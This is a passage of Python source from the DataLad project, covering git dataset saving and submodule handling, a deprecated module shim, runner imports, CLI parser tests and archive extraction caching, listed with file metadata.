'--name-only', '--staged'],\n expect_stderr=True))\n except CommandError as e:\n lgr.debug(CapturedException(e))\n return []\n\n def _save_post(self, message: Optional[str], files: Iterable[Path], partial_commit: bool, amend: bool = False,\n allow_empty: bool = False) -> None:\n # helper to commit changes reported in status\n\n # TODO remove pathobj stringification when commit() can\n # handle it\n to_commit = [str(f.relative_to(self.pathobj))\n for f in files] \\\n if partial_commit else None\n if not partial_commit or to_commit or allow_empty or \\\n (amend and message):\n # we directly call GitRepo.commit() to avoid a whole slew\n # if direct-mode safeguards and workarounds in the AnnexRepo\n # implementation (which also run an additional dry-run commit\n GitRepo.commit(\n self,\n files=to_commit,\n msg=message,\n options=to_options(amend=amend, allow_empty=allow_empty),\n # do not raise on empty commit\n # it could be that the `add` in this save-cycle has already\n # brought back a 'modified' file into a clean state\n careless=True,\n )\n\n def save(self, message: Optional[str] = None, paths: Optional[list[Path]] = None, _status: Optional[dict[Path, dict[str, str]]] = None, **kwargs: Any) -> list[dict]:\n \"\"\"Save dataset content.\n\n Parameters\n ----------\n message : str or None\n A message to accompany the changeset in the log. 
If None,\n a default message is used.\n paths : list or None\n Any content with path matching any of the paths given in this\n list will be saved. Matching will be performed against the\n dataset status (GitRepo.status()), or a custom status provided\n via `_status`. If no paths are provided, ALL non-clean paths\n present in the repo status or `_status` will be saved.\n _status : dict or None\n If None, Repo.status() will be queried for the given `ds`. If\n a dict is given, its content will be used as a constraint.\n For example, to save only modified content, but no untracked\n content, set `paths` to None and provide a `_status` that has\n no entries for untracked content.\n **kwargs :\n Additional arguments that are passed to underlying Repo methods.\n Supported:\n\n - git : bool (passed to Repo.add()\n - eval_submodule_state : {'full', 'commit', 'no'}\n passed to Repo.status()\n - untracked : {'no', 'normal', 'all'} - passed to Repo.status()\n - amend : bool (passed to GitRepo.commit)\n \"\"\"\n return list(\n self.save_(\n message=message,\n paths=paths,\n _status=_status,\n **kwargs\n )\n )\n\n def save_(self, message: Optional[str] = None, paths: Optional[list[Path]] = None, _status: Optional[dict[Path, dict[str, str]]] = None, **kwargs: Any) -> Iterator[dict]:\n \"\"\"Like `save()` but working as a generator.\"\"\"\n from datalad.interface.results import get_status_dict\n\n status_state = _get_save_status_state(\n self._save_pre(paths, _status, **kwargs) or {}\n )\n amend = kwargs.get('amend', False)\n\n # TODO: check on those None's -- may be those are also \"nothing to worry about\"\n # and we could just return?\n if not any(status_state.values()) and not (message and amend):\n # all clean, nothing todo\n lgr.debug('Nothing to save in %r, exiting early', self)\n return\n\n # three things are to be done:\n # - remove (deleted if not already staged)\n # - add (modified/untracked)\n # - commit (with all paths that have been touched, to bypass\n # potential pre-staged bits)\n\n staged_paths = self.get_staged_paths()\n need_partial_commit = bool(staged_paths)\n if need_partial_commit and hasattr(self, \"call_annex\"):\n # so we have some staged content. 
let's check which ones\n # are symlinks -- those could be annex key links that\n # are broken after a `git-mv` operation\n # https://github.com/datalad/datalad/issues/4967\n # call `git-annex pre-commit` on them to rectify this before\n # saving the wrong symlinks\n added = status_state['added']\n tofix = [\n sp for sp in staged_paths\n if added.get(self.pathobj / sp, {}).get(\"type\") == \"symlink\"\n ]\n if tofix:\n self.call_annex(['pre-commit'], files=tofix)\n\n submodule_change = False\n\n if status_state['deleted']:\n vanished_subds = [\n str(f.relative_to(self.pathobj))\n for f, props in status_state['deleted'].items()\n if props.get('type') == 'dataset'\n ]\n if vanished_subds:\n # we submodule removal we use `git-rm`, because the clean-up\n # is more complex than just an index update -- make no\n # sense to have a duplicate implementation.\n # we do not yield here, but only altogether below -- we are just\n # processing gone components, should always be quick.\n self._call_git(['rm', '-q'], files=vanished_subds)\n submodule_change = True\n # remove anything from the index that was found to be gone\n self._call_git(\n ['update-index', '--remove'],\n files=[\n str(f.relative_to(self.pathobj))\n for f, props in status_state['deleted'].items()\n # do not update the index, if there is already\n # something staged for this path (e.g.,\n # a directory was removed and a file staged\n # in its place)\n if not props.get('gitshasum')\n # we already did the submodules\n and props.get('type') != 'dataset'\n ]\n )\n # now yield all deletions\n for p, props in status_state['deleted'].items():\n yield get_status_dict(\n action='delete',\n refds=self.pathobj,\n type=props.get('type'),\n path=str(p),\n status='ok',\n logger=lgr)\n\n # TODO this additional query should not be, based on status as given\n # if anyhow possible, however, when paths are given, status may\n # not contain all required information. 
In case of path=None AND\n # _status=None, we should be able to avoid this, because\n # status should have the full info already\n # looks for contained repositories\n untracked_dirs = [\n f.relative_to(self.pathobj)\n for f, props in status_state['untracked'].items()\n if props.get('type', None) == 'directory']\n to_add_submodules = []\n if untracked_dirs:\n to_add_submodules = [\n sm for sm, sm_props in\n self.get_content_info(\n untracked_dirs,\n ref=None,\n # request exhaustive list, so that everything that is\n # still reported as a directory must be its own repository\n untracked='all').items()\n if sm_props.get('type', None) == 'directory']\n to_add_submodules = _prune_deeper_repos(to_add_submodules)\n\n to_stage_submodules = {\n f: props\n for f, props in status_state['modified_or_untracked'].items()\n if props.get('type', None) == 'dataset'}\n if to_stage_submodules:\n lgr.debug(\n '%i submodule path(s) to stage in %r %s',\n len(to_stage_submodules), self,\n to_stage_submodules\n if len(to_stage_submodules) < 10 else '')\n to_add_submodules += list(to_stage_submodules)\n\n if to_add_submodules:\n for r in self._save_add_submodules(to_add_submodules):\n if r.get('status', None) == 'ok':\n submodule_change = True\n yield r\n\n if submodule_change:\n # this will alter the config, reload\n self.config.reload()\n # need to include .gitmodules in what needs committing\n f = self.pathobj.joinpath('.gitmodules')\n status_state['modified_or_untracked'][f] = \\\n status_state['modified'][f] = \\\n dict(type='file', state='modified')\n # now stage .gitmodules\n self._call_git(['update-index', '--add'], files=['.gitmodules'])\n # and report on it\n yield get_status_dict(\n action='add',\n refds=self.pathobj,\n type='file',\n path=f,\n status='ok',\n logger=lgr)\n\n to_add = {\n # TODO remove pathobj stringification when add() can\n # handle it\n str(f.relative_to(self.pathobj)): props\n for f, props in status_state['modified_or_untracked'].items()\n if not (f in to_add_submodules or f in to_stage_submodules)}\n if to_add:\n compat_config = \\\n self.config.obtain(\"datalad.save.windows-compat-warning\")\n to_add, problems = self._check_for_win_compat(to_add, compat_config)\n lgr.debug(\n '%i path(s) to add to %s %s',\n len(to_add), self, to_add if len(to_add) < 10 else '')\n\n if to_add:\n yield from self._save_add(\n to_add,\n git_opts=None,\n **{k: kwargs[k] for k in kwargs\n if k in (('git',) if hasattr(self, 'uuid')\n else tuple())})\n if problems:\n from datalad.interface.results import get_status_dict\n msg = \\\n 'Incompatible name for Windows systems; disable with ' \\\n 'datalad.save.windows-compat-warning.',\n for path in problems:\n yield get_status_dict(\n action='save',\n refds=self.pathobj,\n type='file',\n path=(self.pathobj / ut.PurePosixPath(path)),\n status='impossible',\n message=msg,\n logger=lgr)\n\n\n # https://github.com/datalad/datalad/issues/6558\n # file could have become a directory. Unfortunately git\n # would then mistakenly refuse to commit if that old path is also\n # given to commit, so we better filter it out\n if status_state['deleted'] and status_state['added']:\n # check if any \"deleted\" is a directory now. 
Then for those\n # there should be some other path under that directory in 'added'\n for f in [_ for _ in status_state['deleted'] if _.is_dir()]:\n # this could potentially be expensive if lots of files become\n # directories, but it is unlikely to happen often\n # Note: PurePath.is_relative_to was added in 3.9 and seems slowish\n # path_is_subpath faster, also if comparing to \"in f.parents\"\n f_str = str(f)\n if any(path_is_subpath(str(f2), f_str) for f2 in status_state['added']):\n status_state['deleted'].pop(f) # do not bother giving it to commit below in _save_post\n\n # Note, that allow_empty is always ok when we amend. Required when we\n # amend an empty commit while the amendment is empty, too (though\n # possibly different message). If an empty commit was okay before, it's\n # okay now.\n status_state.pop('modified_or_untracked') # pop the hybrid state\n self._save_post(message, chain(*status_state.values()), need_partial_commit, amend=amend,\n allow_empty=amend)\n # TODO yield result for commit, prev helper checked hexsha pre\n # and post...\n\n def _check_for_win_compat(self, files: dict[str, Any], config: str) -> tuple[dict[str, Any], Optional[list[str]]]:\n \"\"\"Check file names for illegal characters or reserved names on Windows\n\n In the case that a non-Windows-compatible file is detected, warn users\n about potential interoperability issues.\n\n Parameters\n ----------\n files\n list of files to add\n config\n value of self.config.obtain(\"datalad.save.windows-compat-warning\"),\n used to choose appropriate behavior. \"none\" performs no check,\n \"warning\" warns in case of incompatibilities, and \"error\" results in\n an error result in case of incompatibilities\n \"\"\"\n # don't perform any check when the configuration is set to 'none'\n if config == 'none':\n return files, None\n\n from collections import defaultdict\n problems: dict[str, list[str]] = defaultdict(list)\n for file in files:\n for part in Path(file).parts:\n # check every component of the path for incompatibilities\n if Path(part).stem.upper() in RESERVED_NAMES_WIN:\n problems['Elements using a reserved filename:'].append(part)\n problems['paths'].append(file)\n if re.search(ILLEGAL_CHARS_WIN, part):\n problems['Elements with illegal characters:'].append(part)\n problems['paths'].append(file)\n if part.endswith('.'):\n problems['Elements ending with a dot:'].append(part)\n problems['paths'].append(file)\n if part.endswith(' '):\n problems['Elements ending with a space:'].append(part)\n problems['paths'].append(file)\n if not problems:\n return files, None\n msg = \\\n \"Some elements of your dataset are not compatible with \" \\\n \"Windows systems. 
Disable this check by changing \" \\\n \"datalad.save.windows-compat-warning or consider renaming \" \\\n \"the following elements: \"\n for k, v in problems.items():\n # use the key as an explanation, and report filenames only once\n msg += f\"\\n{k} {[*{*v}]}\" if k != 'paths' else ''\n if config == 'warning':\n lgr.warning(msg)\n return files, None\n\n elif config == 'error':\n # take the problematic files out of to_add\n for path in [*{*problems['paths']}]:\n files.pop(path)\n return files, [*{*problems['paths']}]\n\n else:\n raise ValueError(f\"Invalid 'config' value {config!r}\")\n\n def _save_add(self, files: dict[str, Any], git_opts: Optional[list[str]] = None) -> Iterator[dict]:\n \"\"\"Simple helper to add files in save()\"\"\"\n from datalad.interface.results import get_status_dict\n try:\n # without --verbose git 2.9.3 add does not return anything\n add_out = self._call_git(\n # Set annex.largefiles to prevent storing files in\n # annex with a v6+ annex repo.\n ['-c', 'annex.largefiles=nothing', 'add'] +\n ensure_list(git_opts) + ['--verbose'],\n files=list(files.keys()),\n pathspec_from_file=True,\n )\n # get all the entries\n for r in self._process_git_get_output(*add_out):\n yield get_status_dict(\n action=str(r.get('command', 'add')),\n refds=self.pathobj,\n type='file',\n path=(self.pathobj / ut.PurePosixPath(r['file']))\n if 'file' in r else None,\n status='ok' if r.get('success', None) else 'error',\n key=r.get('key', None),\n # while there is no git-annex underneath here, we\n # tend to fake its behavior, so we can also support\n # this type of messaging\n #message='\\n'.join(r['error-messages'])\n #if 'error-messages' in r else None,\n message=None,\n logger=lgr)\n except OSError as e:\n lgr.error(\"add: %s\", e)\n raise\n\n def _save_add_submodules(self, paths: list[Path] | dict[Path, dict]) -> Iterator[dict]:\n \"\"\"Add new submodules, or updates records of existing ones\n\n This method does not use `git submodule add`, but aims to be more\n efficient by limiting the scope to mere in-place registration of\n multiple already present repositories.\n\n Parameters\n ----------\n paths : list(Path)\n\n Yields\n ------\n dict\n Result records\n \"\"\"\n from datalad.interface.results import get_status_dict\n\n # first gather info from all datasets in read-only fashion, and then\n # update index, .gitmodules and .git/config at once\n info = []\n # To avoid adding already known: https://github.com/datalad/datalad/issues/6843\n # We must not add already known submodules explicitly since \"untracked\"\n # can be assigned even for known ones (TODO: add issue, might have been closed)?\n # Not sure if operating on relative paths would provide any speed up so use full\n known_sub_paths = {s['path'] for s in self.get_submodules_()}\n for path in paths:\n already_known = path in known_sub_paths\n rpath = str(path.relative_to(self.pathobj).as_posix())\n subm = repo_from_path(path)\n # if there is a corresponding branch, we want to record it's state.\n # we rely on the corresponding branch being synced already.\n # `save` should do that each time it runs.\n subm_commit = subm.get_hexsha(subm.get_corresponding_branch())\n if not subm_commit:\n yield get_status_dict(\n action='add_submodule',\n ds=self,\n path=str(path),\n status='error',\n message=('cannot add subdataset %s with no commits', subm),\n logger=lgr)\n continue\n # make an attempt to configure a submodule source URL based on the\n # discovered remote configuration\n remote, branch = subm.get_tracking_branch()\n url = 
subm.get_remote_url(remote) if remote else None\n if url is None:\n url = './{}'.format(rpath)\n subm_id = subm.config.get('datalad.dataset.id', None)\n info.append(\n dict(\n # if we have additional information on this path, pass it on.\n # if not, treat it as an untracked directory\n paths[path] if isinstance(paths, dict)\n else dict(type='directory', state='untracked'),\n path=path, rpath=rpath, commit=subm_commit, id=subm_id,\n url=url, known=already_known))\n\n # bypass any convenience or safe-manipulator for speed reasons\n # use case: saving many new subdatasets in a single run\n with (self.pathobj / '.gitmodules').open('a') as gmf, \\\n (self.pathobj / '.git' / 'config').open('a') as gcf:\n for i in info:\n # we update the subproject commit unconditionally\n self.call_git([\n 'update-index', '--add', '--replace', '--cacheinfo', '160000',\n i['commit'], i['rpath']\n ])\n # only write the .gitmodules/.config changes when this is not yet\n # a subdataset and not yet already known\n # TODO: we could update the URL, and branch info at this point,\n # even for previously registered subdatasets\n if not i['known'] and (i['type'] != 'dataset' or (\n i['type'] == 'dataset' and i['state'] == 'untracked')):\n gmprops = dict(path=i['rpath'], url=i['url'])\n if i['id']:\n gmprops['datalad-id'] = i['id']\n write_config_section(\n gmf, 'submodule', i['rpath'], gmprops)\n write_config_section(\n gcf, 'submodule', i['rpath'], dict(active='true', url=i['url']))\n\n # This mirrors the result structure yielded for\n # to_stage_submodules below.\n yield get_status_dict(\n action='add',\n refds=self.pathobj,\n type='dataset',\n key=None,\n path=i['path'],\n status='ok',\n logger=lgr)\n\n\ndef _get_save_status_state(status: dict[Path, dict[str, str]]) -> dict[Optional[str], dict[Path, dict[str, str]]]:\n \"\"\"\n Returns\n -------\n dict\n By status category by file path, mapped to status properties.\n \"\"\"\n # Sort status into status by state with explicit list of states\n # (excluding clean we do not care about) we expect to be present\n # and which we know of (unless None), and modified_or_untracked hybrid\n # since it is used below\n status_state: dict[Optional[str], dict[Path, dict[str, str]]] = {\n k: {}\n for k in (None, # not cared of explicitly here\n 'added', # not cared of explicitly here\n # 'clean' # not even wanted since nothing to do about those\n 'deleted',\n 'modified',\n 'untracked',\n 'modified_or_untracked', # hybrid group created here\n )}\n for f, props in status.items():\n state = props.get('state', None)\n if state == 'clean':\n # we don't care about clean\n continue\n if state == 'modified' and props.get('gitshasum') \\\n and props.get('gitshasum') == props.get('prev_gitshasum'):\n # reported as modified, but with identical shasums -> typechange\n # a subdataset maybe? 
do increasingly expensive tests for\n # speed reasons\n if props.get('type') != 'dataset' and f.is_dir() \\\n and GitRepo.is_valid_repo(f):\n # it was not a dataset, but now there is one.\n # we declare it untracked to engage the discovery tooling.\n state = 'untracked'\n props = dict(type='dataset', state='untracked')\n status_state[state][f] = props\n # The hybrid one to retain the same order as in original status\n if state in ('modified', 'untracked'):\n status_state['modified_or_untracked'][f] = props\n return status_state\n\n\n# used in in the get command and GitRepo.add_submodule(), the\n# latter is not used outside the tests\ndef _fixup_submodule_dotgit_setup(ds: Dataset, relativepath: str | Path) -> None:\n \"\"\"Implementation of our current of .git in a subdataset\n\n Each subdataset/module has its own .git directory where a standalone\n repository would have it. No gitdir files, no symlinks.\n \"\"\"\n # move .git to superrepo's .git/modules, remove .git, create\n # .git-file\n path = opj(ds.path, relativepath)\n subds_dotgit = opj(path, \".git\")\n\n repo = GitRepo(path, create=False)\n if repo.dot_git.parent == repo.pathobj:\n # this is what we want\n return\n\n # first we want to remove any conflicting worktree setup\n # done by git to find the checkout at the mountpoint of the\n # submodule, if we keep that, any git command will fail\n # after we move .git\n # Ben: Shouldn't we re-setup a possible worktree afterwards?\n repo.config.unset('core.worktree', scope='local')\n # what we have here is some kind of reference, remove and\n # replace by the target\n os.remove(subds_dotgit)\n # make absolute\n src_dotgit = str(repo.dot_git)\n # move .git\n from os import (\n listdir,\n rename,\n rmdir,\n )\n ensure_dir(subds_dotgit)\n for dot_git_entry in listdir(src_dotgit):\n rename(opj(src_dotgit, dot_git_entry),\n opj(subds_dotgit, dot_git_entry))\n assert not listdir(src_dotgit)\n rmdir(src_dotgit)\n\n\n# try retro-fitting GitRepo with deprecated functionality\n# must be done last in this file\ntry:\n from datalad_deprecated.gitrepo import DeprecatedGitRepoMethods\n for symbol in dir(DeprecatedGitRepoMethods):\n if symbol.startswith('__'):\n # ignore Python internals\n continue\n if hasattr(GitRepo, symbol):\n lgr.debug(\n 'Not retro-fitted GitRepo with deprecated %s, '\n 'name-space conflict', symbol)\n # do not override existing symbols\n continue\n # assign deprecated symbol to GitRepo\n setattr(GitRepo, symbol, getattr(DeprecatedGitRepoMethods, symbol))\n lgr.debug('Retro-fitted GitRepo with deprecated %s', symbol)\nexcept ImportError as e:\n ce = CapturedException(e)\n lgr.debug(\n 'Not retro-fitting GitRepo with deprecated symbols, '\n 'datalad-deprecated package not found')\n" }, { "alpha_fraction": 0.5471447706222534, "alphanum_fraction": 0.5604249835014343, "avg_line_length": 36.650001525878906, "blob_id": "e75341ef3af32047a9d8d28eb293767e2b0da1a7", "content_id": "921c6f4f2a39c751e43e4ab765a35e6b99c91e9f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "permissive", "max_line_length": 87, "num_lines": 20, "path": "/datalad/interface/clean.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package 
for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Obsolete module: moved to `local.clean`\n\"\"\"\n\nimport warnings\nwarnings.warn(\n \"Clean has been moved to datalad.local.clean. \"\n \"This module was deprecated in 0.16.0, and will be removed in a future \"\n \"release. Please adjust the import.\",\n DeprecationWarning)\n\n# Import command class to ease 3rd-party transitions\nfrom datalad.local.clean import Clean\n" }, { "alpha_fraction": 0.5716234445571899, "alphanum_fraction": 0.5784447193145752, "avg_line_length": 32.318180084228516, "blob_id": "6bc6998c51b72bd8e38a087e144142c268625d30", "content_id": "c29b6d8b6045291988fd57a84906bb107c375844", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 733, "license_type": "permissive", "max_line_length": 87, "num_lines": 22, "path": "/datalad/runner/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"DataLad command execution runner\n\"\"\"\n\nfrom .coreprotocols import (\n KillOutput,\n NoCapture,\n StdErrCapture,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom .exception import CommandError\nfrom .gitrunner import GitWitlessRunner as GitRunner\nfrom .protocol import WitlessProtocol as Protocol\nfrom .runner import WitlessRunner as Runner\n" }, { "alpha_fraction": 0.5773832201957703, "alphanum_fraction": 0.5808568000793457, "avg_line_length": 30.59756088256836, "blob_id": "d726f94b24ce2ff1561899945a3ad649655640f3", "content_id": "5f6d2291ab4c67a79f482711f65034c99119fa6d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2591, "license_type": "permissive", "max_line_length": 79, "num_lines": 82, "path": "/datalad/cli/tests/test_parser.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Tests for parser components\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom io import StringIO\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_raises,\n)\n\nfrom ..parser import (\n fail_with_short_help,\n setup_parser,\n)\n\n\ndef test_fail_with_short_help():\n out = StringIO()\n with assert_raises(SystemExit) as cme:\n fail_with_short_help(exit_code=3, out=out)\n assert_equal(cme.value.code, 3)\n assert_equal(out.getvalue(), \"\")\n\n out = StringIO()\n with assert_raises(SystemExit) as cme:\n fail_with_short_help(msg=\"Failed badly\", out=out)\n assert_equal(cme.value.code, 1)\n assert_equal(out.getvalue(), \"error: Failed badly\\n\")\n\n # Suggestions, hint, etc\n out = StringIO()\n with assert_raises(SystemExit) as cme:\n fail_with_short_help(\n msg=\"Failed badly\",\n known=[\"mother\", \"mutter\", \"father\", \"son\"],\n provided=\"muther\",\n hint=\"You can become one\",\n exit_code=0, # no one forbids\n what=\"parent\",\n out=out)\n assert_equal(cme.value.code, 0)\n assert_equal(out.getvalue(),\n \"error: Failed badly\\n\"\n \"datalad: Unknown parent 'muther'. 
See 'datalad --help'.\\n\\n\"\n \"Did you mean any of these?\\n\"\n \" mutter\\n\"\n \" mother\\n\"\n \" father\\n\"\n \"Hint: You can become one\\n\")\n\n\ndef check_setup_parser(args, exit_code=None):\n parser = None\n with patch('sys.stderr', new_callable=StringIO) as cmerr:\n with patch('sys.stdout', new_callable=StringIO) as cmout:\n if exit_code is not None:\n with assert_raises(SystemExit) as cm:\n setup_parser(args)\n else:\n parser = setup_parser(args)\n if exit_code is not None:\n assert_equal(cm.value.code, exit_code)\n stdout = cmout.getvalue()\n stderr = cmerr.getvalue()\n return {'parser': parser, 'out': stdout, 'err': stderr}\n\n\ndef test_setup():\n # insufficient arguments\n check_setup_parser([], 2)\n assert_in('too few arguments', check_setup_parser(['datalad'], 2)['err'])\n assert_in('.', check_setup_parser(['datalad', '--version'], 0)['out'])\n parser = check_setup_parser(['datalad', 'wtf'])['parser']\n # check into the guts of argparse to check that really only a single\n # subparser was constructed\n assert_equal(\n list(parser._positionals._group_actions[0].choices.keys()),\n ['wtf']\n )\n" }, { "alpha_fraction": 0.5814915299415588, "alphanum_fraction": 0.5833436250686646, "avg_line_length": 36.23678207397461, "blob_id": "0fb1a2e35b08e1b999f9d6dd122d79e309d371d6", "content_id": "a5ef87990abd1c83289c650b2b43a145dbf67686", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16198, "license_type": "permissive", "max_line_length": 95, "num_lines": 435, "path": "/datalad/support/archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Various handlers/functionality for different types of files (e.g. 
for archives)\n\n\"\"\"\n\nimport hashlib\nimport logging\nimport os\nimport random\nimport string\nimport tempfile\n\nfrom datalad import cfg\nfrom datalad.config import anything2bool\nfrom datalad.consts import ARCHIVES_TEMP_DIR\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.locking import lock_if_check_fails\nfrom datalad.support.path import (\n abspath,\n exists,\n isabs,\n isdir,\n)\nfrom datalad.support.path import join as opj\nfrom datalad.support.path import (\n normpath,\n pardir,\n relpath,\n)\nfrom datalad.support.path import sep as opsep\nfrom datalad.utils import (\n Path,\n any_re_search,\n ensure_bytes,\n ensure_unicode,\n get_tempfile_kwargs,\n on_windows,\n rmtemp,\n rmtree,\n unlink,\n)\n\n# fall back on patool, if requested, or 7z is not found\nif (cfg.obtain('datalad.runtime.use-patool', default=False,\n valtype=anything2bool)\n or not external_versions['cmd:7z']):\n from datalad.support.archive_utils_patool import compress_files\n from datalad.support.archive_utils_patool import \\\n decompress_file as \\\n _decompress_file # other code expects this to be here\nelse:\n from datalad.support.archive_utils_7z import compress_files\n from datalad.support.archive_utils_7z import \\\n decompress_file as \\\n _decompress_file # other code expects this to be here\n\nlgr = logging.getLogger('datalad.support.archives')\n\n\ndef decompress_file(archive, dir_, leading_directories='strip'):\n \"\"\"Decompress `archive` into a directory `dir_`\n\n Parameters\n ----------\n archive: str\n dir_: str\n leading_directories: {'strip', None}\n If `strip`, and archive contains a single leading directory under which\n all content is stored, all the content will be moved one directory up\n and that leading directory will be removed.\n \"\"\"\n if not exists(dir_):\n lgr.debug(\"Creating directory %s to extract archive into\", dir_)\n os.makedirs(dir_)\n\n _decompress_file(archive, dir_)\n\n if leading_directories == 'strip':\n _, dirs, files = next(os.walk(dir_))\n if not len(files) and len(dirs) == 1:\n # move all the content under dirs[0] up 1 level\n widow_dir = opj(dir_, dirs[0])\n lgr.debug(\"Moving content within %s upstairs\", widow_dir)\n subdir, subdirs_, files_ = next(os.walk(opj(dir_, dirs[0])))\n for f in subdirs_ + files_:\n os.rename(opj(subdir, f), opj(dir_, f))\n # NFS might hold it victim so use rmtree so it tries a few times\n rmtree(widow_dir)\n elif leading_directories is None:\n pass # really do nothing\n else:\n raise NotImplementedError(\"Not supported %s\" % leading_directories)\n\n\ndef _get_cached_filename(archive):\n \"\"\"A helper to generate a filename which has original filename and additional suffix\n which wouldn't collide across files with the same name from different locations\n \"\"\"\n #return \"%s_%s\" % (basename(archive), hashlib.md5(archive).hexdigest()[:5])\n # per se there is no reason to maintain any long original name here.\n archive_cached = hashlib.md5(ensure_bytes(str(Path(archive).resolve()))).hexdigest()[:10]\n lgr.debug(\"Cached directory for archive %s is %s\", archive, archive_cached)\n return archive_cached\n\n\ndef _get_random_id(size=6, chars=string.ascii_uppercase + string.digits):\n \"\"\"Return a random ID composed from digits and uppercase letters\n\n upper-case so we are tolerant to unlikely collisions on dummy FSs\n \"\"\"\n return ''.join(random.choice(chars) for _ in range(size))\n\n\nclass ArchivesCache(object):\n \"\"\"Cache to maintain extracted archives\n\n Parameters\n ----------\n 
toppath : str\n Top directory under .git/ of which temp directory would be created.\n If not provided -- random tempdir is used\n persistent : bool, optional\n Passed over into generated ExtractedArchives\n \"\"\"\n # TODO: make caching persistent across sessions/runs, with cleanup\n # IDEA: extract under .git/annex/tmp so later on annex unused could clean it\n # all up\n def __init__(self, toppath=None, persistent=False):\n self._toppath = toppath\n if toppath:\n path = opj(toppath, ARCHIVES_TEMP_DIR)\n if not persistent:\n tempsuffix = \"-\" + _get_random_id()\n lgr.debug(\"For non-persistent archives using %s suffix for path %s\",\n tempsuffix, path)\n path += tempsuffix\n # TODO: begging for a race condition\n if not exists(path):\n lgr.debug(\"Initiating clean cache for the archives under %s\",\n path)\n try:\n self._made_path = True\n os.makedirs(path)\n lgr.debug(\"Cache initialized\")\n except Exception:\n lgr.error(\"Failed to initialize cached under %s\", path)\n raise\n else:\n lgr.debug(\n \"Not initiating existing cache for the archives under %s\",\n path)\n self._made_path = False\n else:\n if persistent:\n raise ValueError(\n \"%s cannot be persistent, because no toppath was provided\"\n % self)\n path = tempfile.mkdtemp(**get_tempfile_kwargs())\n self._made_path = True\n\n self._path = path\n self.persistent = persistent\n # TODO? ensure that it is absent or we should allow for it to persist a bit?\n #if exists(path):\n # self._clean_cache()\n self._archives = {}\n\n # TODO: begging for a race condition\n if not exists(path):\n lgr.debug(\"Initiating clean cache for the archives under %s\", self.path)\n try:\n self._made_path = True\n os.makedirs(path)\n lgr.debug(\"Cache initialized\")\n except Exception as e:\n lgr.error(\"Failed to initialize cached under %s\", path)\n raise\n else:\n lgr.debug(\"Not initiating existing cache for the archives under %s\", self.path)\n self._made_path = False\n\n @property\n def path(self):\n return self._path\n\n def clean(self, force=False):\n for aname, a in list(self._archives.items()):\n a.clean(force=force)\n del self._archives[aname]\n # Probably we should not rely on _made_path and not bother if persistent removing it\n # if ((not self.persistent) or force) and self._made_path:\n # lgr.debug(\"Removing the entire archives cache under %s\", self.path)\n # rmtemp(self.path)\n if (not self.persistent) or force:\n lgr.debug(\"Removing the entire archives cache under %s\", self.path)\n rmtemp(self.path)\n\n def _get_normalized_archive_path(self, archive):\n \"\"\"Return full path to archive\n\n So we have consistent operation from different subdirs,\n while referencing archives from the topdir\n\n TODO: why do we need it???\n \"\"\"\n if not isabs(archive) and self._toppath:\n out = normpath(opj(self._toppath, archive))\n if relpath(out, self._toppath).startswith(pardir):\n raise RuntimeError(\"%s points outside of the topdir %s\"\n % (archive, self._toppath))\n if isdir(out):\n raise RuntimeError(\"got a directory here... 
bleh\")\n return out\n return archive\n\n def get_archive(self, archive):\n archive = self._get_normalized_archive_path(archive)\n\n if archive not in self._archives:\n self._archives[archive] = \\\n ExtractedArchive(archive,\n opj(self.path, _get_cached_filename(archive)),\n persistent=self.persistent)\n\n return self._archives[archive]\n\n def __getitem__(self, archive):\n return self.get_archive(archive)\n\n def __delitem__(self, archive):\n archive = self._get_normalized_archive_path(archive)\n self._archives[archive].clean()\n del self._archives[archive]\n\n def __del__(self):\n try:\n # we can at least try\n if not self.persistent:\n self.clean()\n except: # MIH: IOError?\n pass\n\n\nclass ExtractedArchive(object):\n \"\"\"Container for the extracted archive\n \"\"\"\n\n # suffix to use for a stamp so we could guarantee that extracted archive is\n STAMP_SUFFIX = '.stamp'\n\n def __init__(self, archive, path=None, persistent=False):\n self._archive = archive\n # TODO: bad location for extracted archive -- use tempfile\n if not path:\n path = tempfile.mktemp(**get_tempfile_kwargs(prefix=_get_cached_filename(archive)))\n\n if exists(path) and not persistent:\n raise RuntimeError(\"Directory %s already exists whenever it should not \"\n \"persist\" % path)\n self._persistent = persistent\n self._path = path\n\n def __repr__(self):\n return \"%s(%r, path=%r)\" % (self.__class__.__name__, self._archive, self.path)\n\n def clean(self, force=False):\n # would interfere with tests\n # if 